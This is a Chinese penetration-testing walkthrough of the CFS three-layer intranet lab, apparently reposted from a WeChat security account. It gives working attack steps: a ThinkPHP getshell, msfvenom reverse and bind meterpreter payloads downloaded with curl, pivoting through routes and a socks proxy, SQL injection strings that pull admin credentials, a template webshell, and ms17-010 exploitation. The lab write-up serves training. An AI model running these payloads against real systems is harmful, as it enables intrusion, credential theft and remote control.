网络拓扑图
环境搭建
1.设置虚拟机网卡
子网IP:12.12.12.0 子网掩码:255.255.255.0
子网IP:192.168.217.0 子网掩码:255.255.255.0
target1
一张nat网卡,与攻击机互通也就是相当于公网卡,一张内网卡与target互通
target2
一张内网卡,另外一张网卡为192.168.217.0段网卡
target3
最终结果:实现两两互通,即攻击机能ping通target1 ;target1能ping通target2 ;target2能ping通target3
渗透测试
1.goby扫描,得知开启80端口
使用dirsearch扫描
访问
http://192.168.137.144/public/得知是 TP框架
使用TP漏洞利用工具getshell
这里直接使用工具的一键getshell功能
webshell上传后使用蚁剑进行链接
针对target2信息收集与内网渗透
1,查看targte1,网卡信息得知,存在12.12.12.0网段
msf上线target1
msfvenom生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf lhost=vpsip lport=6666 >shell.elf
2.将生成的木马传输到目标机器的tmp目录下。
攻击机使用python3开启web服务
使用curl将shell.elf下载到tmp目录下
curl -o http:192.168.137.129:8000/shell.elf
msf开启监听,进行上线。
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lport 6666
set lhost vpsip
exploit
通过蚁剑在target1上执行./shell.elf进行上线
查看添加路由规则
获取当前的网段:run get_local_subnets
查看路由:run autoroute -p
添加12.12.12.0网段的路由
run autoroute -s 12.12.12.0/24
再次查看路由:run autoroute -p
添加路由后,使用msf内置模块开启socks代理
use auxiliary/server/socks_proxy
set SRVHOST vpsip
set SRVPORT 6363
set version 4a
run
使用netstat -anp查看代理端口是否开启
设置proxychains代理工具对内网地址进行扫描
设置配置文件
这里为了节省时间,如果扫描网段的话时间比较久,直接扫描目标地址
proxychains nmap -sT -Pn 12.12.12.129
80端口开启,浏览器设置代理访问一下
八哥cms,通过查看源码,发现有SQL注入漏洞
注入语句:
获取库名
' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e))--+
获取表名
' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='bagecms' limit 1,1),0x7e))--+
获取列名
' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='bagecms' and table_name='bage_admin' limit 1,1),0x7e))--+
获取用户名密码
' and extractvalue(1,concat(0x7e,(select username from bage_admin),0x7e))--+
' and extractvalue(1,concat(0x7e,(select password from bage_admin),0x7e))--+
这里显示不全的话可以去掉~号
使用cmd5解密后得到的密码
可以使用proxychians代理dirserach扫描目录
通过/robots.txt获取后台
进入后台在模板处写入一句话getshell
提交后,使用蚁剑设置代理,并进行链接。
信息收集
查看网卡信息
过查看网络信息得知217网段
msf上线target2
1.通过msfvenom生成木马后门 ,但是此处的后门要生成一个正向的后门
重点理解:
反向:我们拿下了target_2的web权限,如果我们上传的是反向的木马,那么target_2就要去寻找我们vps的路由,但是target_2主机中没有vps的路由,那么就会导致我们的反弹shell失败
正向:我们生成了一个正向的木马,我们的vps攻击机就会去主动寻找target_2的服务器,这个时候我们应为做了一个socks的代理,我们的流量会通过vps的ip的6363端口代理给target_1,然后target1_中是存在12网段中的路由的,所以我们可以正常进行连接。
2. 生成正向木马
msfvenom -p linux/x64/meterpreter/bind_tcp lport=9999 -f elf >shell2.elf
将生成后的木马使用蚁剑进行上传
3.使用proxychains开启msfconsole,并设置监听
proxychains msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set lport 9999
set rhost target2的通向target1的网卡
run
4.使用蚁剑执行木马上线
上线后添加路由
获取当前的网段:run get_local_subnets
查看路由:run autoroute -p
添加路由:run autoroute -s 192.168.33.0/24
再次查看路由:run autoroute -p
这里我们已经处于target_2的网络下,可以通向217网段,直接调用模块扫描217网段
use scanner/smb/smb_version
show options
set RHOSTS 192.168.217.0/24
然后设置THREADS线程数。为50
exploit
扫描到目标主机为192.168.217.140,开发445端口,这里我们使用ms17-010来测试一下
use auxiliary/scanner/smb/smb_ms17_010
调用ms17-010模块攻击
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp //设置正向连接
show options //设置
set RHOST 192.168.217.140
exploit
至此,我们通过代理成功拿下了三层内网机器!
查看端口信息开启了3389
使用SocksCap64(Normal User Mode)配置代理添加远程连接工具,进行链接
链接成功
原文始发于微信公众号(云梦安全实验室):CFS三层内网靶场渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论